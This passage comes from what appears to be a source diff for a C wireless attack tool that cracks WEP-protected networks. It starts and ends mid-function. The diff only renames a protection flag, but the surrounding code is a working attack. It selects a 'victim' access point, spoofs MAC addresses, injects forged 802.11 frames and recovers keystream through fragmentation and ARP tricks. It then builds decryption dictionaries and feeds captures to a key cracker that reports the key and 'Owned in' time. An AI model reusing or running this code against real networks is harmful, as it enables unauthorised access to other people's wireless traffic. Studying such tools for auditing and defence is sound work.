t->tm_sec, lame); } void check_key() { char buf[1024]; int fd; int rd; struct timeval now; fd = open(KEY_FILE, O_RDONLY); if (fd == -1) { return; } rd = read(fd, buf, sizeof(buf) -1); if (rd == -1) { perror("read()"); exit(1); } buf[rd] = 0; close(fd); printf ("\n\n"); time_print("KEY=(%s)\n", buf); if (gettimeofday(&now, NULL) == -1) { perror("gettimeofday()"); exit(1); } printf ("Owned in %.02f minutes\n", ((double) now.tv_sec - real_start.tv_sec)/60.0); exit(0); } void kill_crack() { if (crack_pid == 0) return; printf("\n"); time_print("Stopping crack PID=%d\n", crack_pid); // XXX doesn't return -1 for some reason! [maybe on my box... so it // might be buggy on other boxes...] if (kill(crack_pid, SIGINT) == -1) { perror("kill()"); exit(1); } crack_pid = 0; check_key(); } void cleanup(int x) { time_print("\nDying...\n"); if (weplog.fd) close(weplog.fd); kill_crack(); exit(0); } void set_chan(int c) { if (c == chaninfo.chan) return; chaninfo.ireq.i_val = c; if (ioctl(chaninfo.s, SIOCS80211, &chaninfo.ireq) == -1) { perror("ioctl(SIOCS80211) [chan]"); exit(1); } chaninfo.chan = c; } void set_if_mac(unsigned char* mac, unsigned char *name) { int s; struct ifreq ifr; s = socket(PF_INET, SOCK_DGRAM, 0); if (s == -1) { perror("socket()"); exit(1); } memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, name); ifr.ifr_addr.sa_family = AF_LINK; ifr.ifr_addr.sa_len = 6; memcpy(ifr.ifr_addr.sa_data, mac, 6); if (ioctl(s, SIOCSIFLLADDR, &ifr) == -1) { perror("ioctl(SIOCSIFLLADDR)"); exit(1); } close(s); } void setup_if(char *dev) { int s; struct ifreq ifr; unsigned int flags; struct ifmediareq ifmr; int *mwords; if(strlen(dev) >= IFNAMSIZ) { time_print("Interface name too long...\n"); exit(1); } time_print("Setting up %s... 
", dev); fflush(stdout); set_if_mac(mymac, dev); s = socket(PF_INET, SOCK_DGRAM, 0); if (s == -1) { perror("socket()"); exit(1); } // set chan memset(&chaninfo.ireq, 0, sizeof(chaninfo.ireq)); strcpy(chaninfo.ireq.i_name, dev); chaninfo.ireq.i_type = IEEE80211_IOC_CHANNEL; chaninfo.chan = 0; chaninfo.s = s; set_chan(1); // set iface up and promisc memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, dev); if (ioctl(s, SIOCGIFFLAGS, &ifr) == -1) { perror("ioctl(SIOCGIFFLAGS)"); exit(1); } flags = (ifr.ifr_flags & 0xffff) | (ifr.ifr_flagshigh << 16); flags |= IFF_UP | IFF_PPROMISC; memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, dev); ifr.ifr_flags = flags & 0xffff; ifr.ifr_flagshigh = flags >> 16; if (ioctl(s, SIOCSIFFLAGS, &ifr) == -1) { perror("ioctl(SIOCSIFFLAGS)"); exit(1); } printf("done\n"); } int open_bpf(char *dev, int dlt) { int i; char buf[64]; int fd = -1; struct ifreq ifr; for(i = 0;i < 16; i++) { sprintf(buf, "/dev/bpf%d", i); fd = open(buf, O_RDWR); if(fd < 0) { if(errno != EBUSY) { perror("can't open /dev/bpf"); exit(1); } continue; } else break; } if(fd < 0) { perror("can't open /dev/bpf"); exit(1); } strncpy(ifr.ifr_name, dev, sizeof(ifr.ifr_name)-1); ifr.ifr_name[sizeof(ifr.ifr_name)-1] = 0; if(ioctl(fd, BIOCSETIF, &ifr) < 0) { perror("ioctl(BIOCSETIF)"); exit(1); } if (ioctl(fd, BIOCSDLT, &dlt) < 0) { perror("ioctl(BIOCSDLT)"); exit(1); } i = 1; if(ioctl(fd, BIOCIMMEDIATE, &i) < 0) { perror("ioctl(BIOCIMMEDIATE)"); exit(1); } return fd; } void hexdump(unsigned char *ptr, int len) { while(len > 0) { printf("%.2X ", *ptr); ptr++; len--; } printf("\n"); } char* mac2str(unsigned char* mac) { static char ret[6*3]; sprintf(ret, "%.2X:%.2X:%.2X:%.2X:%.2X:%.2X", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]); return ret; } void inject(int fd, void *buf, int len) { static struct ieee80211_bpf_params params = { .ibp_vers = IEEE80211_BPF_VERSION, /* NB: no need to pass series 2-4 rate+try */ .ibp_len = sizeof(struct ieee80211_bpf_params) - 6, .ibp_rate0 = 2, /* 1 MB/s XXX */ .ibp_try0 = 1, /* no retransmits */ .ibp_flags = IEEE80211_BPF_NOACK, .ibp_power = 100, /* nominal max */ .ibp_pri = WME_AC_VO, /* high priority */ }; struct iovec iov[2]; int rc; iov[0].iov_base = ¶ms; iov[0].iov_len = params.ibp_len; iov[1].iov_base = buf; iov[1].iov_len = len; rc = writev(fd, iov, 2); if(rc == -1) { perror("writev()"); exit(1); } if (rc != (len + iov[0].iov_len)) { time_print("Error Wrote %d out of %d\n", rc, len+iov[0].iov_len); exit(1); } } void send_frame(int tx, unsigned char* buf, int len) { static unsigned char* lame = 0; static int lamelen = 0; static int lastlen = 0; // retransmit! 
if (len == -1) { txstate.retries++; if (txstate.retries > 10) { time_print("ERROR Max retransmists for (%d bytes):\n", lastlen); hexdump(&lame[0], lastlen); // exit(1); } len = lastlen; // printf("Warning doing a retransmit...\n"); } // normal tx else { assert(!txstate.waiting_ack); if (len > lamelen) { if (lame) free(lame); lame = (unsigned char*) malloc(len); if(!lame) { perror("malloc()"); exit(1); } lamelen = len; } memcpy(lame, buf, len); txstate.retries = 0; lastlen = len; } inject(tx, lame, len); txstate.waiting_ack = 1; txstate.psent++; if (gettimeofday(&txstate.tsent, NULL) == -1) { perror("gettimeofday()"); exit(1); } #if 0 printf("Wrote frame at %lu.%lu\n", txstate.tsent.tv_sec, txstate.tsent.tv_usec); #endif } unsigned short fnseq(unsigned short fn, unsigned short seq) { unsigned short r = 0; if(fn > 15) { time_print("too many fragments (%d)\n", fn); exit(1); } r = fn; r |= ( (seq % 4096) << IEEE80211_SEQ_SEQ_SHIFT); return r; } void fill_basic(struct ieee80211_frame* wh) { unsigned short* sp; memcpy(wh->i_addr1, victim.bss, 6); memcpy(wh->i_addr2, mymac, 6); memcpy(wh->i_addr3, victim.bss, 6); sp = (unsigned short*) wh->i_seq; *sp = fnseq(0, txstate.psent); sp = (unsigned short*) wh->i_dur; *sp = htole16(32767); } void send_assoc(int tx) { unsigned char buf[128]; struct ieee80211_frame* wh = (struct ieee80211_frame*) buf; unsigned char* body; int ssidlen; memset(buf, 0, sizeof(buf)); fill_basic(wh); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_ASSOC_REQ; body = (unsigned char*) wh + sizeof(*wh); *body = 1 | IEEE80211_CAPINFO_PRIVACY; // cap // cap + interval body += 2 + 2; // ssid *body++ = 0; ssidlen = strlen(victim.ssid); *body++ = ssidlen; memcpy(body, victim.ssid, ssidlen); body += ssidlen; // rates *body++ = 1; *body++ = 4; *body++ = 2; *body++ = 4; *body++ = 11; *body++ = 22; send_frame(tx, buf, sizeof(*wh) + 2 + 2 + 2 + strlen(victim.ssid) + 2 + 4); } void wepify(unsigned char* body, int dlen) { uLong crc; unsigned long *pcrc; int i; assert(dlen + 4 <= prgainfo.len); // iv memcpy(body, prgainfo.iv, 3); body +=3; *body++ = 0; // crc crc = crc32(0L, Z_NULL, 0); crc = crc32(crc, body, dlen); pcrc = (unsigned long*) (body+dlen); *pcrc = crc; for (i = 0; i < dlen +4; i++) *body++ ^= prgainfo.prga[i]; } void send_auth(int tx) { unsigned char buf[128]; struct ieee80211_frame* wh = (struct ieee80211_frame*) buf; unsigned short* n; memset(buf, 0, sizeof(buf)); fill_basic(wh); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_AUTH; n = (unsigned short*) ((unsigned char*) wh + sizeof(*wh)); n++; *n = 1; send_frame(tx, buf, sizeof(*wh) + 2 + 2 + 2); } int get_victim_ssid(struct ieee80211_frame* wh, int len) { unsigned char* ptr; int x; int gots = 0, gotc = 0; if (len <= sizeof(*wh)) { time_print("Warning: short packet in get_victim_ssid()\n"); return 0; } ptr = (unsigned char*)wh + sizeof(*wh); len -= sizeof(*wh); // only wep baby if ( !(IEEE80211_BEACON_CAPABILITY(ptr) & IEEE80211_CAPINFO_PRIVACY)) { return 0; } // we want a specific victim if (victim_mac) { if (memcmp(wh->i_addr3, victim_mac, 6) != 0) return 0; } // beacon header x = 8 + 2 + 2; if (len <= x) { time_print("Warning short.asdfasdf\n"); return 0; } ptr += x; len -= x; // SSID while(len > 2) { int eid, elen; eid = *ptr; ptr++; elen = *ptr; ptr++; len -= 2; if (len < elen) { time_print("Warning short....\n"); return 0; } // ssid if (eid == 0) { if (victim.ssid) free(victim.ssid); victim.ssid = (char*) malloc(elen + 1); if (!victim.ssid) { perror("malloc()"); exit(1); } memcpy(victim.ssid, 
ptr, elen); victim.ssid[elen] = 0; gots = 1; } // chan else if(eid == 3) { if( elen != 1) { time_print("Warning len of chan not 1\n"); return 0; } victim.chan = *ptr; gotc = 1; } ptr += elen; len -= elen; } if (gots && gotc) { memcpy(victim.bss, wh->i_addr3, 6); set_chan(victim.chan); state = FOUND_VICTIM; time_print("Found SSID(%s) BSS=(%s) chan=%d\n", victim.ssid, mac2str(victim.bss), victim.chan); return 1; } return 0; } void send_ack(int tx) { /* firmware acks */ } void do_llc(unsigned char* buf, unsigned short type) { struct llc* h = (struct llc*) buf; memset(h, 0, sizeof(*h)); h->llc_dsap = LLC_SNAP_LSAP; h->llc_ssap = LLC_SNAP_LSAP; h->llc_un.type_snap.control = 3; h->llc_un.type_snap.ether_type = htons(type); } void calculate_inet_clear() { struct ip* ih; struct udphdr* uh; uLong crc; unsigned long *pcrc; int dlen; memset(inet_clear, 0, sizeof(inet_clear)); do_llc(inet_clear, ETHERTYPE_IP); ih = (struct ip*) &inet_clear[8]; ih->ip_hl = 5; ih->ip_v = 4; ih->ip_tos = 0; ih->ip_len = htons(20+8+PRGA_LEN); ih->ip_id = htons(666); ih->ip_off = 0; ih->ip_ttl = ttl_val; ih->ip_p = IPPROTO_UDP; ih->ip_sum = 0; inet_aton(floodip, &ih->ip_src); inet_aton(myip, &ih->ip_dst); ih->ip_sum = in_cksum((unsigned short*)ih, 20); uh = (struct udphdr*) ((char*)ih + 20); uh->uh_sport = htons(floodport); uh->uh_dport = htons(floodsport); uh->uh_ulen = htons(8+PRGA_LEN); uh->uh_sum = 0; uh->uh_sum = udp_checksum((unsigned char*)uh, 8+PRGA_LEN, &ih->ip_src, &ih->ip_dst); // crc dlen = 8 + 20 + 8 + PRGA_LEN; assert (dlen + 4 <= sizeof(inet_clear)); crc = crc32(0L, Z_NULL, 0); crc = crc32(crc, inet_clear, dlen); pcrc = (unsigned long*) (inet_clear+dlen); *pcrc = crc; #if 0 printf("INET %d\n", sizeof(inet_clear)); hexdump(inet_clear, sizeof(inet_clear)); #endif } void set_prga(unsigned char* iv, unsigned char* cipher, unsigned char* clear, int len) { int i; int fd; if (prgainfo.len != 0) free(prgainfo.prga); prgainfo.prga = (unsigned char*) malloc(len); if (!prgainfo.prga) { perror("malloc()"); exit(1); } prgainfo.len = len; memcpy(prgainfo.iv, iv, 3); for (i = 0; i < len; i++) { prgainfo.prga[i] = ( cipher ? (clear[i] ^ cipher[i]) : clear[i]); } time_print("Got %d bytes of prga IV=(%.02x:%.02x:%.02x) PRGA=", prgainfo.len, prgainfo.iv[0], prgainfo.iv[1], prgainfo.iv[2]); hexdump(prgainfo.prga, prgainfo.len); if (!cipher) return; fd = open(PRGA_FILE, O_WRONLY | O_CREAT, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH); if (fd == -1) { perror("open()"); exit(1); } i = write(fd, prgainfo.iv, 3); if (i == -1) { perror("write()"); exit(1); } if (i != 3) { printf("Wrote %d out of %d\n", i, 3); exit(1); } i = write(fd, prgainfo.prga, prgainfo.len); if (i == -1) { perror("write()"); exit(1); } if (i != prgainfo.len) { printf("Wrote %d out of %d\n", i, prgainfo.len); exit(1); } close(fd); } void log_dictionary(unsigned char* body, int len) { char paths[3][3]; int i, rd; int fd; unsigned char path[128]; unsigned char file_clear[sizeof(inet_clear)]; unsigned char* data; len -= 4; // IV etc.. 
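// len now covers just the ciphertext (flood payload plus the 4-byte WEP ICV) and
// must match the precomputed inet_clear plaintext exactly, since the per-IV
// keystream logged below is simply data[i] ^ inet_clear[i].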
assert (len == sizeof(inet_clear)); data = body +4; if (len > prgainfo.len) set_prga(body, data, inet_clear, len); for (i = 0; i < 3; i++) snprintf(paths[i], sizeof(paths[i]), "%.2X", body[i]); strcpy(path, DICT_PATH); // first 2 bytes for (i = 0; i < 2; i++) { strcat(path, "/"); strcat(path, paths[i]); fd = open(path, O_RDONLY); if (fd == -1) { if (errno != ENOENT) { perror("open()"); exit(1); } if (mkdir(path, 0755) == -1) { perror("mkdir()"); exit(1); } } else close(fd); } // last byte strcat(path, "/"); strcat(path, paths[2]); fd = open(path, O_RDWR); // already exists... see if we are consistent... if (fd != -1) { rd = read(fd, file_clear, sizeof(file_clear)); if (rd == -1) { perror("read()"); exit(1); } // check consistency.... for (i = 0; i < rd; i++) { if (file_clear[i] != (data[i] ^ inet_clear[i])) { printf("Mismatch in byte %d for:\n", i); hexdump(body, len+4); exit(1); } } // no need to log if (i >= sizeof(inet_clear)) { #if 0 time_print("Not logging IV %.2X:%.2X:%.2X cuz we got it\n", body[0], body[1], body[2]); #endif close(fd); return; } // file has less... fd still open } else { fd = open(path, O_WRONLY | O_CREAT, 0644); if (fd == -1) { printf("Can't open (%s): %s\n", path, strerror(errno)); exit(1); } } assert (sizeof(file_clear) >= sizeof(inet_clear)); for(i = 0; i < len; i++) file_clear[i] = data[i] ^ inet_clear[i]; rd = write(fd, file_clear, len); if (rd == -1) { perror("write()"); exit(1); } if (rd != len) { printf("Wrote %d of %d\n", rd, len); exit(1); } close(fd); } void stuff_for_us(struct ieee80211_frame* wh, int len) { int type,stype; unsigned char* body; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; body = (unsigned char*) wh + sizeof(*wh); // CTL if (type == IEEE80211_FC0_TYPE_CTL) { if (stype == IEEE80211_FC0_SUBTYPE_ACK) { txstate.waiting_ack = 0; return; } if (stype == IEEE80211_FC0_SUBTYPE_RTS) { return; } if (stype == IEEE80211_FC0_SUBTYPE_CTS) { return; } time_print ("got CTL=%x\n", stype); return; } // MGM if (type == IEEE80211_FC0_TYPE_MGT) { if (stype == IEEE80211_FC0_SUBTYPE_DEAUTH) { unsigned short* rc = (unsigned short*) body; printf("\n"); time_print("Got deauth=%u\n", le16toh(*rc)); state = FOUND_VICTIM; return; exit(1); } else if (stype == IEEE80211_FC0_SUBTYPE_AUTH) { unsigned short* sc = (unsigned short*) body; if (*sc != 0) { time_print("Warning got auth algo=%x\n", *sc); exit(1); return; } sc++; if (*sc != 2) { time_print("Warning got auth seq=%x\n", *sc); return; } sc++; if (*sc == 1) { time_print("Auth rejected... trying to spoof mac.\n"); state = SPOOF_MAC; return; } else if (*sc == 0) { time_print("Authenticated\n"); state = GOT_AUTH; return; } else { time_print("Got auth %x\n", *sc); exit(1); } } else if (stype == IEEE80211_FC0_SUBTYPE_ASSOC_RESP) { unsigned short* sc = (unsigned short*) body; sc++; // cap if (*sc == 0) { sc++; unsigned int aid = le16toh(*sc) & 0x3FFF; time_print("Associated (ID=%x)\n", aid); state = GOT_ASSOC; return; } else if (*sc == 12) { time_print("Assoc rejected..." 
" trying to spoof mac.\n"); state = SPOOF_MAC; return; } else { time_print("got assoc %x\n", *sc); exit(1); } } else if (stype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) { return; } time_print("\nGOT MAN=%x\n", stype); exit(1); } if (type == IEEE80211_FC0_TYPE_DATA && stype == IEEE80211_FC0_SUBTYPE_DATA) { int dlen; dlen = len - sizeof(*wh) - 4 -4; - if (!( wh->i_fc[1] & IEEE80211_FC1_WEP)) { + if (!( wh->i_fc[1] & IEEE80211_FC1_PROTECTED)) { time_print("WARNING: Got NON wep packet from %s dlen %d stype=%x\n", mac2str(wh->i_addr2), dlen, stype); return; } - assert (wh->i_fc[1] & IEEE80211_FC1_WEP); + assert (wh->i_fc[1] & IEEE80211_FC1_PROTECTED); if ((dlen == 36 || dlen == PADDED_ARPLEN) && rtrmac == (unsigned char*) 1) { rtrmac = (unsigned char *) malloc(6); if (!rtrmac) { perror("malloc()"); exit(1); } assert( rtrmac > (unsigned char*) 1); memcpy (rtrmac, wh->i_addr3, 6); time_print("Got arp reply from (%s)\n", mac2str(rtrmac)); return; } #if 0 // check if its a TTL update from dictionary stuff if (dlen >= (8+20+8+MAGIC_TTL_PAD) && dlen <= (8+20+8+MAGIC_TTL_PAD+128)) { int ttl_delta, new_ttl; ttl_delta = dlen - 8 - 20 - 8 - MAGIC_TTL_PAD; new_ttl = 128 - ttl_delta; if (ttl_val && new_ttl != ttl_val) { time_print("oops. ttl changed from %d to %d\n", ttl_val, new_ttl); exit(1); } if (!ttl_val) { ttl_val = new_ttl; printf("\n"); time_print("Got TTL of %d\n", ttl_val); calculate_inet_clear(); } } // check if its dictionary data if (ttl_val && dlen == (8+20+8+PRGA_LEN)) { log_dictionary(body, len - sizeof(*wh)); } #endif } #if 0 printf ("Got frame for us (type=%x stype=%x) from=(%s) len=%d\n", type, stype, mac2str(wh->i_addr2), len); #endif } void decrypt_arpreq(struct ieee80211_frame* wh, int rd) { unsigned char* body; int bodylen; unsigned char clear[36]; unsigned char* ptr; struct arphdr* h; int i; body = (unsigned char*) wh+sizeof(*wh); ptr = clear; // calculate clear-text memcpy(ptr, arp_clear, sizeof(arp_clear)-1); ptr += sizeof(arp_clear) -1; h = (struct arphdr*)ptr; h->ar_hrd = htons(ARPHRD_ETHER); h->ar_pro = htons(ETHERTYPE_IP); h->ar_hln = 6; h->ar_pln = 4; h->ar_op = htons(ARPOP_REQUEST); ptr += sizeof(*h); memcpy(ptr, wh->i_addr3, 6); bodylen = rd - sizeof(*wh) - 4 - 4; decryptstate.clen = bodylen; decryptstate.cipher = (unsigned char*) malloc(decryptstate.clen); if (!decryptstate.cipher) { perror("malloc()"); exit(1); } decryptstate.prgainfo.prga = (unsigned char*) malloc(decryptstate.clen); if (!decryptstate.prgainfo.prga) { perror("malloc()"); exit(1); } memcpy(decryptstate.cipher, &body[4], decryptstate.clen); memcpy(decryptstate.prgainfo.iv, body, 3); memset(decryptstate.prgainfo.prga, 0, decryptstate.clen); for(i = 0; i < (8+8+6); i++) { decryptstate.prgainfo.prga[i] = decryptstate.cipher[i] ^ clear[i]; } decryptstate.prgainfo.len = i; time_print("Got ARP request from (%s)\n", mac2str(wh->i_addr3)); } void log_wep(struct ieee80211_frame* wh, int len) { int rd; struct pcap_pkthdr pkh; struct timeval tv; unsigned char *body = (unsigned char*) (wh+1); memset(&pkh, 0, sizeof(pkh)); pkh.caplen = pkh.len = len; if (gettimeofday(&tv, NULL) == -1) err(1, "gettimeofday()"); pkh.ts = tv; if (write(weplog.fd, &pkh, sizeof(pkh)) != sizeof(pkh)) err(1, "write()"); rd = write(weplog.fd, wh, len); if (rd == -1) { perror("write()"); exit(1); } if (rd != len) { time_print("short write %d out of %d\n", rd, len); exit(1); } #if 0 if (fsync(weplog.fd) == -1) { perror("fsync()"); exit(1); } #endif memcpy(weplog.iv, body, 3); weplog.packets++; } void try_dictionary(struct ieee80211_frame* wh, int 
len) { unsigned char *body; char path[52]; char paths[3][3]; int i; int fd, rd; unsigned char packet[4096]; int dlen; struct ether_header* eh; uLong crc; unsigned long *pcrc; unsigned char* dmac, *smac; assert (len < sizeof(packet) + sizeof(*eh)); body = (unsigned char*) wh + sizeof(*wh); for (i = 0; i < 3; i++) snprintf(paths[i], sizeof(paths[i]), "%.2X", body[i]); sprintf(path, "%s/%s/%s/%s", DICT_PATH, paths[0], paths[1], paths[2]); fd = open(path, O_RDONLY); if (fd == -1) return; rd = read(fd, &packet[6], sizeof(packet)-6); if (rd == -1) { perror("read()"); exit(1); } close(fd); dlen = len - sizeof(*wh) - 4; if (dlen > rd) { printf("\n"); time_print("Had PRGA (%s) but too little (%d/%d)\n", path, rd, dlen); return; } body += 4; for (i = 0; i < dlen; i++) packet[6+i] ^= body[i]; dlen -= 4; crc = crc32(0L, Z_NULL, 0); crc = crc32(crc, &packet[6], dlen); pcrc = (unsigned long*) (&packet[6+dlen]); if (*pcrc != crc) { printf("\n"); time_print("HAD PRGA (%s) checksum mismatch! (%x %x)\n", path, *pcrc, crc); return; } // fill ethernet header eh = (struct ether_header*) packet; if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) smac = wh->i_addr3; else smac = wh->i_addr2; if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) dmac = wh->i_addr3; else dmac = wh->i_addr1; memcpy(eh->ether_dhost, dmac, 6); memcpy(eh->ether_shost, smac, 6); // ether type should be there from llc dlen -= 8; // llc dlen += sizeof(*eh); #if 0 printf("\n"); time_print("Decrypted packet [%d bytes]!!! w00t\n", dlen); hexdump(packet, dlen); #endif rd = write(tapfd, packet, dlen); if (rd == -1) { perror("write()"); exit(1); } if (rd != dlen) { printf("Wrote %d / %d\n", rd, dlen); exit(1); } } int is_arp(struct ieee80211_frame *wh, int len) { int arpsize = 8 + sizeof(struct arphdr) + 10*2; if (len == arpsize || len == 54) return 1; return 0; } void *get_sa(struct ieee80211_frame *wh) { if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) return wh->i_addr3; else return wh->i_addr2; } void *get_da(struct ieee80211_frame *wh) { if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) return wh->i_addr1; else return wh->i_addr3; } int known_clear(void *clear, struct ieee80211_frame *wh, int len) { unsigned char *ptr = clear; /* IP */ if (!is_arp(wh, len)) { unsigned short iplen = htons(len - 8); // printf("Assuming IP %d\n", len); len = sizeof(S_LLC_SNAP_IP) - 1; memcpy(ptr, S_LLC_SNAP_IP, len); ptr += len; #if 1 len = 2; memcpy(ptr, "\x45\x00", len); ptr += len; memcpy(ptr, &iplen, len); ptr += len; #endif len = ptr - ((unsigned char*)clear); return len; } // printf("Assuming ARP %d\n", len); /* arp */ len = sizeof(S_LLC_SNAP_ARP) - 1; memcpy(ptr, S_LLC_SNAP_ARP, len); ptr += len; /* arp hdr */ len = 6; memcpy(ptr, "\x00\x01\x08\x00\x06\x04", len); ptr += len; /* type of arp */ len = 2; if (memcmp(get_da(wh), "\xff\xff\xff\xff\xff\xff", 6) == 0) memcpy(ptr, "\x00\x01", len); else memcpy(ptr, "\x00\x02", len); ptr += len; /* src mac */ len = 6; memcpy(ptr, get_sa(wh), len); ptr += len; len = ptr - ((unsigned char*)clear); return len; } void add_keystream(struct ieee80211_frame* wh, int rd) { unsigned char clear[1024]; int dlen = rd - sizeof(struct ieee80211_frame) - 4 - 4; int clearsize; unsigned char *body = (unsigned char*) (wh+1); int i; clearsize = known_clear(clear, wh, dlen); if (clearsize < 16) return; for (i = 0; i < 16; i++) clear[i] ^= body[4+i]; PTW_addsession(ptw, body, clear); } void got_wep(struct ieee80211_frame* wh, int rd) { int bodylen; int dlen; unsigned char clear[1024]; int clearsize; unsigned char *body; bodylen = rd - sizeof(struct 
ieee80211_frame); dlen = bodylen - 4 - 4; body = (unsigned char*) wh + sizeof(*wh); // log it if its stuff not from us... if ( (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) || ( (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) && memcmp(wh->i_addr2, mymac, 6) != 0) ) { if (body[3] != 0) { time_print("Key index=%x!!\n", body[3]); exit(1); } log_wep(wh, rd); add_keystream(wh, rd); // try to decrypt too try_dictionary(wh, rd); } // look for arp-request packets... so we can decrypt em if ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) && (memcmp(wh->i_addr3, mymac, 6) != 0) && (memcmp(wh->i_addr1, "\xff\xff\xff\xff\xff\xff", 6) == 0) && (dlen == 36 || dlen == PADDED_ARPLEN) && !decryptstate.cipher && !netip) { decrypt_arpreq(wh, rd); } // we have prga... check if its our stuff being relayed... if (prgainfo.len != 0) { // looks like it... if ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) && (memcmp(wh->i_addr3, mymac, 6) == 0) && (memcmp(wh->i_addr1, "\xff\xff\xff\xff\xff\xff", 6) == 0) && dlen == fragstate.len) { // printf("I fink AP relayed it...\n"); set_prga(body, &body[4], fragstate.data, dlen); free(fragstate.data); fragstate.data = 0; fragstate.waiting_relay = 0; } // see if we get the multicast stuff of when decrypting if ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) && (memcmp(wh->i_addr3, mymac, 6) == 0) && (memcmp(wh->i_addr1, MCAST_PREF, 5) == 0) && dlen == 36) { unsigned char pr = wh->i_addr1[5]; printf("\n"); time_print("Got clear-text byte: %d\n", decryptstate.cipher[decryptstate.prgainfo.len-1] ^ pr); decryptstate.prgainfo.prga[decryptstate.prgainfo.len-1] = pr; decryptstate.prgainfo.len++; decryptstate.fragstate.waiting_relay = 1; // ok we got the ip... if (decryptstate.prgainfo.len == 26+1) { unsigned char ip[4]; int i; struct in_addr *in = (struct in_addr*) ip; unsigned char *ptr; for (i = 0; i < 4; i++) ip[i] = decryptstate.cipher[8+8+6+i] ^ decryptstate.prgainfo.prga[8+8+6+i]; assert(!netip); netip = (unsigned char*) malloc(16); if(!netip) { perror("malloc()"); exit(1); } memset(netip, 0, 16); strcpy(netip, inet_ntoa(*in)); time_print("Got IP=(%s)\n", netip); strcpy(myip, netip); ptr = strchr(myip, '.'); assert(ptr); ptr = strchr(ptr+1, '.'); assert(ptr); ptr = strchr(ptr+1, '.'); assert(ptr); strcpy(ptr+1,"123"); time_print("My IP=(%s)\n", myip); free(decryptstate.prgainfo.prga); free(decryptstate.cipher); memset(&decryptstate, 0, sizeof(decryptstate)); } } return; } clearsize = known_clear(clear, wh, dlen); time_print("Datalen %d Known clear %d\n", dlen, clearsize); set_prga(body, &body[4], clear, clearsize); } void stuff_for_net(struct ieee80211_frame* wh, int rd) { int type,stype; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if (type == IEEE80211_FC0_TYPE_DATA && stype == IEEE80211_FC0_SUBTYPE_DATA) { int dlen = rd - sizeof(struct ieee80211_frame); if (state == SPOOF_MAC) { unsigned char mac[6]; if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) { memcpy(mac, wh->i_addr3, 6); } else if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) { memcpy(mac, wh->i_addr1, 6); } else assert(0); if (mac[0] == 0xff || mac[0] == 0x1) return; memcpy(mymac, mac, 6); time_print("Trying to use MAC=(%s)\n", mac2str(mymac)); state = FOUND_VICTIM; return; } // wep data! 
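// Only frames with the Protected bit set (the flag formerly spelled IEEE80211_FC1_WEP) and more payload than just IV (4) + LLC/SNAP (8) + ICV (4) are handed to got_wep() below.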
- if ( (wh->i_fc[1] & IEEE80211_FC1_WEP) && dlen > (4+8+4)) { + if ( (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) && + dlen > (4+8+4)) { got_wep(wh, rd); } } } void anal(unsigned char* buf, int rd, int tx) { // yze struct ieee80211_frame* wh = (struct ieee80211_frame *) buf; int type,stype; static int lastseq = -1; int seq; unsigned short *seqptr; int for_us = 0; if (rd < 1) { time_print("rd=%d\n", rd); exit(1); } type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; // sort out acks if (state >= FOUND_VICTIM) { // stuff for us if (memcmp(wh->i_addr1, mymac, 6) == 0) { for_us = 1; if (type != IEEE80211_FC0_TYPE_CTL) send_ack(tx); } } // XXX i know it aint great... seqptr = (unsigned short*) wh->i_seq; seq = (*seqptr & IEEE80211_SEQ_SEQ_MASK) >> IEEE80211_SEQ_SEQ_SHIFT; if (seq == lastseq && (wh->i_fc[1] & IEEE80211_FC1_RETRY) && type != IEEE80211_FC0_TYPE_CTL) { // printf("Ignoring dup packet... seq=%d\n", seq); return; } lastseq = seq; // management frame if (type == IEEE80211_FC0_TYPE_MGT) { if(state == FIND_VICTIM) { if (stype == IEEE80211_FC0_SUBTYPE_BEACON || stype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) { if (get_victim_ssid(wh, rd)) { return; } } } } if (state >= FOUND_VICTIM) { // stuff for us if (for_us) { stuff_for_us(wh, rd); } // stuff in network [even for us] if ( ((wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) && (memcmp(victim.bss, wh->i_addr1, 6) == 0)) || ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) && (memcmp(victim.bss, wh->i_addr2, 6) == 0)) ) { stuff_for_net(wh, rd); } } } void do_arp(unsigned char* buf, unsigned short op, unsigned char* m1, unsigned char* i1, unsigned char* m2, unsigned char* i2) { struct in_addr sip; struct in_addr dip; struct arphdr* h; unsigned char* data; inet_aton(i1, &sip); inet_aton(i2, &dip); h = (struct arphdr*) buf; memset(h, 0, sizeof(*h)); h->ar_hrd = htons(ARPHRD_ETHER); h->ar_pro = htons(ETHERTYPE_IP); h->ar_hln = 6; h->ar_pln = 4; h->ar_op = htons(op); data = (unsigned char*) h + sizeof(*h); memcpy(data, m1, 6); data += 6; memcpy(data, &sip, 4); data += 4; memcpy(data, m2, 6); data += 6; memcpy(data, &dip, 4); data += 4; } void send_fragment(int tx, struct frag_state* fs, struct prga_info *pi) { unsigned char buf[4096]; struct ieee80211_frame* wh; unsigned char* body; int fragsize; uLong crc; unsigned long *pcrc; int i; unsigned short* seq; unsigned short sn, fn; wh = (struct 